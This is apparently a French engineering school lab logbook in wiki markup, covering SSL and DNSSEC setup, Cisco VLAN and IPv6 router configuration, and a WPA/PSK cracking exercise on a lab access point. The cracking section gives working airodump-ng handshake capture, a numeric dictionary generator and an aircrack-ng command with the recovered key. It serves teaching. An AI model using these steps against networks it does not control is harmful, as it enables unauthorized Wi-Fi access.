  Email Address []:qboens@polytech-lille.net&lt;br /&gt;
&lt;br /&gt;
Cette opération génére deux fichiers : dionysos.space.crt et dionysos.space.key&lt;br /&gt;
&lt;br /&gt;
Une fois cette étape faite on récupére sur gandi GandiStandardSSLCA2.pem, dans l'onglet du certificat.&lt;br /&gt;
&lt;br /&gt;
Tous les fichiers sont placés dans le répertoire SSL_certif&lt;br /&gt;
  mv dionysos.space.csr SSL_certif&lt;br /&gt;
  mv dionysos.space.key SSL_certif&lt;br /&gt;
  mv GandiStandardSSLCA2.pem SSL_certif&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Installation de DNSSEC====&lt;br /&gt;
&lt;br /&gt;
Création de la clef KSK&lt;br /&gt;
  dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE dionysos.space&lt;br /&gt;
&lt;br /&gt;
Création de la clef ZSK&lt;br /&gt;
  dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE dionysos.space&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ces clefs ont été crées dans le dossier SSL_certif&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Création d'un fichier signé à partir de db.dionysos.space&lt;br /&gt;
  dnssec-signzone -o dionysos.space -k dionysos-ksk.key /etc/bind/db.dionysos.space dionysos-zsk.key &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Dans named.conf.local nous changons le fichier cible, pour que bind9 prenne en compte db.dionysos.space.signed, qui est le fichier signé&lt;br /&gt;
  zone &amp;quot;dionysos.space&amp;quot;{&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.dionysos.space.signed&amp;quot;;&lt;br /&gt;
        allow-transfer{217.70.177.40;}; //Autorisation transfert vers ns6.gandi.net&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
Puis nous relançons bind9&lt;br /&gt;
  service bind9 restart&lt;br /&gt;
&lt;br /&gt;
Sur le site gandi nous ajoutons les deux clefs, dans l'onglet DNSSEC&lt;br /&gt;
&lt;br /&gt;
===Séance 3.5 : 14/12/2018===&lt;br /&gt;
&lt;br /&gt;
====Craquage WPA/PSK par dictionnaire====&lt;br /&gt;
&lt;br /&gt;
Materiel utilisé :&lt;br /&gt;
&lt;br /&gt;
* un PC portable&lt;br /&gt;
* une clé Wi-Pi (nécessaire pour le PC portable que nous avons utilisé pour la partie handshake)&lt;br /&gt;
* Zabeth13 pour le craquage&lt;br /&gt;
&lt;br /&gt;
=====Récupération du handshake=====&lt;br /&gt;
&lt;br /&gt;
Premièrement sur le PC portable SOLE, &lt;br /&gt;
&lt;br /&gt;
 #ip a&lt;br /&gt;
&lt;br /&gt;
pour vérifier que nous disposons bien d'une interface wifi &amp;lt;code&amp;gt;wlx40a5ef0f68ce&amp;lt;/code&amp;gt;, puis nous l'utilisons pour écouter sur le wifi :&lt;br /&gt;
&lt;br /&gt;
 #airmon-ng start &amp;lt;nom_de_l'interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On récupère l'interface retournée, dans notre cas &amp;lt;code&amp;gt;wlan0mon&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 #airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
On note l'ESSID de cracotte02 et son channel pour ensuite renvoyer dans des fichiers&lt;br /&gt;
&lt;br /&gt;
 #airodump-ng --bssid &amp;lt;ESSID cracotte02&amp;gt; wlan0mon --channel 9 --write FILENAME&lt;br /&gt;
&lt;br /&gt;
On dispose ensuite de 4 fichiers FILENAME.cap FILENAME.csv FILENAME.kismet.csv FILENAME.kismet.netxml&lt;br /&gt;
&lt;br /&gt;
On peut à présent transférer ces fichiers sur ZABETH13 via clé usb:&lt;br /&gt;
&lt;br /&gt;
=====Rappel montage USB=====&lt;br /&gt;
&lt;br /&gt;
 #fdisk -l                                                 //avant de brancher la clé USB&lt;br /&gt;
 #fdisk -l                                                 //on récupère l'emplacement de la clé (ex: /dev/sdb -&amp;gt; /dev/sdb1)&lt;br /&gt;
 #mkdir /media/MA_CLE_USB&lt;br /&gt;
 #mount /dev/sdb1 /media/MA_CLE_USB&lt;br /&gt;
 #mv /home/pifou/Mon_FICHIER /media/MA_CLE_USB             //répéter autant que nécessaire&lt;br /&gt;
 #umount /media/MA_CLE_USB&lt;br /&gt;
&lt;br /&gt;
=====Crack WPA/PSK=====&lt;br /&gt;
&lt;br /&gt;
On crée un petit programme &amp;lt;code&amp;gt;main.c&amp;lt;/code&amp;gt; pour lister tous les codes possibles, on sait qu'il s'agit d'un code de 8 chiffres&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
 int main(){&lt;br /&gt;
     int i;&lt;br /&gt;
     // key is 8 numeric digits&lt;br /&gt;
     for(i=0;i&amp;lt;99999999;i++){&lt;br /&gt;
         printf(&amp;quot;%d\n&amp;quot;,i);&lt;br /&gt;
     }&lt;br /&gt;
     return 0;&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
On compile et on stock dans un txt&lt;br /&gt;
&lt;br /&gt;
 #gcc main.c -o main -Wall&lt;br /&gt;
 #./main &amp;gt; dictionnaire.txt&lt;br /&gt;
&lt;br /&gt;
On peut à présent lancer le crack&lt;br /&gt;
&lt;br /&gt;
 #aircrack-ng FILENAME.cap -w dictionnaire.txt&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:crack-cracotte02.png]]&lt;br /&gt;
&lt;br /&gt;
Après un certains temps d'execution, on obtient la clé&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Found_key.png]]&lt;br /&gt;
&lt;br /&gt;
Clé : 42429902&lt;br /&gt;
===Séance 4 : 17/12/2018===&lt;br /&gt;
====Correction IPV6 routeur====&lt;br /&gt;
&lt;br /&gt;
===== Vlan 43 - XEN =====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan43&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vlan 131 - Interconnexion =====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan 131&lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
 ipv6 address fe80::2 link-local                  &lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 rip tpima2a5 enable                        &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vlan 10+N - Groupe N =====&lt;br /&gt;
&lt;br /&gt;
'''IPv4'''&lt;br /&gt;
&lt;br /&gt;
* Notre Routeur : &amp;lt;code&amp;gt;10.60.10+N.252&amp;lt;/code&amp;gt;&lt;br /&gt;
* Routeur Virtuel : &amp;lt;code&amp;gt;10.60.10+N.254&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''IPv6'''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;2001:660:4401:60XX&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* VLAN 11 à 21 : &amp;lt;code&amp;gt;C1&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;CB&amp;lt;/code&amp;gt;&lt;br /&gt;
* VLAN 43 : &amp;lt;code&amp;gt;C0&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Groupe 1&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan11&lt;br /&gt;
 int vlan11&lt;br /&gt;
 ip address 10.60.11.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 11 ip 10.60.11.254&lt;br /&gt;
 standby 11 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C1::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C1::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 11&lt;br /&gt;
 name groupe1&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 2&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan12&lt;br /&gt;
 int vlan12&lt;br /&gt;
 ip address 10.60.12.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 12 ip 10.60.12.254&lt;br /&gt;
 standby 12 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C2::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C2::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 12&lt;br /&gt;
 name groupe2&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 3&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan13&lt;br /&gt;
 int vlan13&lt;br /&gt;
 ip address 10.60.13.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 13 ip 10.60.13.254&lt;br /&gt;
 standby 13 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C3::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C3::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 13&lt;br /&gt;
 name groupe3&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 4&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan14&lt;br /&gt;
 int vlan14&lt;br /&gt;
 ip address 10.60.14.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 14 ip 10.60.14.254&lt;br /&gt;
 standby 14 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C4::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C4::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 14&lt;br /&gt;
 name groupe4&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 5&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan15&lt;br /&gt;
 int vlan15&lt;br /&gt;
 ip address 10.60.15.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 15 ip 10.60.15.254&lt;br /&gt;
 standby 15 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C5::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C5::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 15&lt;br /&gt;
 name groupe5&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 6&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan16&lt;br /&gt;
 int vlan16&lt;br /&gt;
 ip address 10.60.16.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 16 ip 10.60.16.254&lt;br /&gt;
 standby 16 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C6::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C6::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 16&lt;br /&gt;
 name groupe6&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 7&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan17&lt;br /&gt;
 int vlan17&lt;br /&gt;
 ip address 10.60.17.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 17 ip 10.60.17.254&lt;br /&gt;
 standby 17 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C7::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C7::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 17&lt;br /&gt;
 name groupe7&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 8&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan18&lt;br /&gt;
 int vlan18&lt;br /&gt;
 ip address 10.60.18.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 18 ip 10.60.18.254&lt;br /&gt;
 standby 18 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C8::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C8::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 18&lt;br /&gt;
 name groupe8&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 9&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan19&lt;br /&gt;
 int vlan19&lt;br /&gt;
 ip address 10.60.19.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 19 ip 10.60.19.254&lt;br /&gt;
 standby 19 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C9::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C9::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 19&lt;br /&gt;
 name groupe9&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 10&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan20&lt;br /&gt;
 int vlan20&lt;br /&gt;
 ip address 10.60.20.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 20 ip 10.60.20.254&lt;br /&gt;
 standby 20 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60CA::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CA::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 20&lt;br /&gt;
 name groupe10&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 11&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan21&lt;br /&gt;
 int vlan21&lt;br /&gt;
 ip address 10.60.21.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 21 ip 10.60.21.254&lt;br /&gt;
 standby 21 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60CB::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CB::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 21&lt;br /&gt;
 name groupe11&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vérifications du fonctionnement =====&lt;br /&gt;
&lt;br /&gt;
====== show running-config ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show run &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 spanning-tree mode pvst&lt;br /&gt;
 spanning-tree loopguard default&lt;br /&gt;
 spanning-tree etherchannel guard misconfig&lt;br /&gt;
 spanning-tree extend system-id&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/3&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/4&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/5&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/6&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/7&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !         &lt;br /&gt;
 interface GigabitEthernet0/8&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/9&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/10&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/11&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 interface TenGigabitEthernet0/1&lt;br /&gt;
  switchport access vlan 131&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode access&lt;br /&gt;
 !&lt;br /&gt;
 interface TenGigabitEthernet0/2&lt;br /&gt;
  switchport access vlan 43&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode access&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan1&lt;br /&gt;
  ip address 10.60.1.252 255.255.255.0&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan11&lt;br /&gt;
  ip address 10.60.11.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C1::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C1::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 11 ip 10.60.11.254&lt;br /&gt;
  standby 11 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan12&lt;br /&gt;
  ip address 10.60.12.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C2::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C2::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 12 ip 10.60.12.254&lt;br /&gt;
  standby 12 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan13&lt;br /&gt;
  ip address 10.60.13.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C3::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C3::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 13 ip 10.60.13.254&lt;br /&gt;
  standby 13 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan14&lt;br /&gt;
  ip address 10.60.14.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C4::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C4::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 14 ip 10.60.14.254&lt;br /&gt;
  standby 14 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan15&lt;br /&gt;
  ip address 10.60.15.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C5::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C5::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 15 ip 10.60.15.254&lt;br /&gt;
  standby 15 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan16&lt;br /&gt;
  ip address 10.60.16.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C6::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C6::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 16 ip 10.60.16.254&lt;br /&gt;
  standby 16 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan17&lt;br /&gt;
  ip address 10.60.17.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C7::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C7::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 17 ip 10.60.17.254&lt;br /&gt;
  standby 17 preempt&lt;br /&gt;
 !         &lt;br /&gt;
 interface Vlan18&lt;br /&gt;
  ip address 10.60.18.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C8::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C8::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 18 ip 10.60.18.254&lt;br /&gt;
  standby 18 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan19&lt;br /&gt;
  ip address 10.60.19.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C9::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C9::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 19 ip 10.60.19.254&lt;br /&gt;
  standby 19 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan20&lt;br /&gt;
  ip address 10.60.20.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60CA::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60CA::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 20 ip 10.60.20.254&lt;br /&gt;
  standby 20 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan21&lt;br /&gt;
  ip address 10.60.21.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60CB::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60CB::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 21 ip 10.60.21.254&lt;br /&gt;
  standby 21 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan43&lt;br /&gt;
  ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
  ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 22 ip 193.48.57.190&lt;br /&gt;
  standby 22 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan131&lt;br /&gt;
  ip address 192.168.222.9 255.255.255.248&lt;br /&gt;
  ipv6 address FE80::2 link-local&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 rip tpima2a5 enable&lt;br /&gt;
 !&lt;br /&gt;
 router ospf 1&lt;br /&gt;
  router-id 10.60.11.252&lt;br /&gt;
  log-adjacency-changes&lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
  summary-address 192.168.0.0 255.255.255.0 not-advertise&lt;br /&gt;
  summary-address 10.60.0.0 255.255.0.0 not-advertise&lt;br /&gt;
  redistribute connected subnets&lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 ipv6 router rip tpima5sc&lt;br /&gt;
  redistribute connected metric 1&lt;br /&gt;
  redistribute static metric 1&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 end&lt;br /&gt;
&lt;br /&gt;
====== Show Interface status ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show int status &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 Port      Name               Status       Vlan       Duplex  Speed Type&lt;br /&gt;
 Gi0/1                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/2                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/3                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/4                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/5                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/6                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/7                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/8                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/9                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/10                       connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 &lt;br /&gt;
 Gi0/11                       connected    trunk      a-full a-1000 10/100/1000BaseTX            // Vers C2&lt;br /&gt;
 &lt;br /&gt;
 Gi0/12                       notconnect   1            auto   auto 10/100/1000BaseTX            // Borne Wi-Fi du groupe 1&lt;br /&gt;
 &lt;br /&gt;
 Gi0/13                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 Gi0/14                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 [...]                        //           //           //     //   //&lt;br /&gt;
 Gi0/47                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 Gi0/48                       notconnect   1            auto   auto 10/100/1000BaseTX  &lt;br /&gt;
           &lt;br /&gt;
 Te0/1                        connected    131          full    10G 10GBase-SR                   // Vers SR52&lt;br /&gt;
 Te0/2                        connected    43           full    10G 10GBase-SR                   // Vers Cordouan&lt;br /&gt;
&lt;br /&gt;
====== IPv6 ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show ipv6 route &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 Switch#show ipv6 route&lt;br /&gt;
 IPv6 Routing Table - Default - 53 entries&lt;br /&gt;
 Codes: C - Connected, L - Local, S - Static, U - Per-user Static route&lt;br /&gt;
        B - BGP, R - RIP, D - EIGRP, EX - EIGRP external&lt;br /&gt;
        O - OSPF Intra, OI - OSPF Inter, OE1 - OSPF ext 1, OE2 - OSPF ext 2&lt;br /&gt;
        ON1 - OSPF NSSA ext 1, ON2 - OSPF NSSA ext 2&lt;br /&gt;
 R   ::/0 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:60::/64 [120/2]&lt;br /&gt;
